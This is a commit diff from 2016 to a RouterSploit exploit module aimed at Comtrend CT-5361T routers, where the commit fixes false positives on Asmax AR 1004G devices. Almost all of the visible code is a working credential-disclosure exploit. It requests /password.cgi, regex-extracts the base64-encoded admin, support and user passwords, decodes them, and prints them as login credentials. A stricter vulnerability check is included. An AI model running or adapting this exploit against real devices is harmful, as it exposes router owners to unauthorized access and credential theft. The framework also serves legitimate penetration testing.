Fixing false positive for asmax ar 1004g devices.

af188ee4 · Marcin Bury · 42342469 · af188ee4
Commit af188ee4 authored Apr 30, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 40 additions and 28 deletions

ct_5361t_password_disclosure.py ...modules/exploits/comtrend/ct_5361t_password_disclosure.py +40 -28

No files found.
--- a/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
+++ b/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
@@ -38,34 +38,34 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target port')  # default port
    def run(self):
-        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
+        if self.check():
+            url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
+            print_status("Requesting for {}".format(url))
-        print_status("Requesting for {}".format(url))
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
-        response = http_request(method="GET", url=url)
+            regexps = [("admin", "pwdAdmin = '(.+?)'"),
-        if response is None:
+                       ("support", "pwdSupport = '(.+?)'"),
-            return
+                       ("user", "pwdUser = '(.+?)'")]
-        creds = []
+            creds = []
-        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
+            for regexp in regexps:
-        if len(admin):
+                res = re.findall(regexp[1], response.text)
-            creds.append(('Admin', b64decode(admin[0])))
+                if len(res):
-        support = re.findall("pwdSupport = '(.+?)'", response.text)
+                    creds.append((regexp[0], b64decode(res[0])))
-        if len(support):
-            creds.append(('Support', b64decode(support[0])))
+            if len(creds):
+                print_success("Credentials found!")
-        user = re.findall("pwdUser = '(.+?)'", response.text)
+                headers = ("Login", "Password")
-        if len(user):
+                print_table(headers, *creds)
-            creds.append(('User', b64decode(user[0])))
+                print("NOTE: Admin is commonly implemented as root")
+            else:
-        if len(creds):
+                print_error("Credentials could not be found")
-            print_success("Credentials found!")
-            headers = ("Login", "Password")
-            print_table(headers, *creds)
-            print("NOTE: Admin is commonly implemented as root")
        else:
-            print_error("Credentials could not be found")
+            print_error("Device seems to be not vulnerable")
    @mute
    def check(self):
@@ -75,7 +75,19 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable
-        if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
+        regexps = ["pwdAdmin = '(.+?)'",
-            return True  # target vulnerable
+                   "pwdSupport = '(.+?)'",
+                   "pwdUser = '(.+?)'"]
+        for regexp in regexps:
+            res = re.findall(regexp, response.text)
+            if len(res):
+                try:
+                    b64decode(res[0])  # checking if data is base64 encoded
+                except:
+                    return False  # target is not vulnerable
+            else:
+                return False  # target is not vulnerable
-        return False  # target is not vulnerable
+        return True  # target is vulnerable